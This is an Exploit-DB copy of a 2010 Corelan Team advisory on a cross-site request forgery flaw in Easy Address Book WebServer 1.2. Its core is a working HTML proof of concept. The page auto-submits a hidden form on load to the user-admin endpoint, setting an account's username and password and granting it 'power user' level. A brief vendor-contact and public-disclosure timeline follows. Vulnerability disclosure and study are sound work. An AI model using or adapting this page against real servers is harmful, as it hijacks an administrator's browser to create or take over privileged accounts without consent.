Easy Address book WebServer 1.2 - Cross-Site Request Forgery

EDB-ID:

12754

CVE:



Author:

Markot

Type:

webapps


Platform:

PHP

Date:

2010-05-26


        |------------------------------------------------------------------|
        |                         __               __                      |
        |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
        |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
        | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
        | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
        |                                                                  |
        |                                       http://www.corelan.be:8800 |
        |                                              security@corelan.be |
        |                                                                  |
        |-------------------------------------------------[ EIP Hunters ]--|

# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-043
# Software      : Easy Address Book WebServer 1.2
# Author        : Markot
# Date          : May 25, 2010
# OS            : Windows
# Tested on     : XP SP3 En (Virtual box)
# Type of vuln  : CSRF
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

#code

 <html>
 <body>
 <body onload="document.forms['Login'].submit();">
 <form method="POST" name="Login" action="http://192.168.1.200:80/users_admin.ghp">
 <input type="hidden" name="userid" value="3"/>
 <input type="hidden" name="username" value="corelanteam"/>
 <input type="hidden" name="password" value="corelanteam"/>
 <input type="hidden" name="email" value="markot@corelan.be"/>
 <input type="hidden" name="level" value="power user"/>
 <input type="hidden" name="state" value="Enable"/>
 <input type="hidden" name="add_user" value="Update"/>
 </form>
 </body>
 </html>

Author/Vendor communication

 May 1 2010 : vendor contacted

 May 17 2010: reminder sent, no feedback from the vendor

 May 25 2010: Public disclosure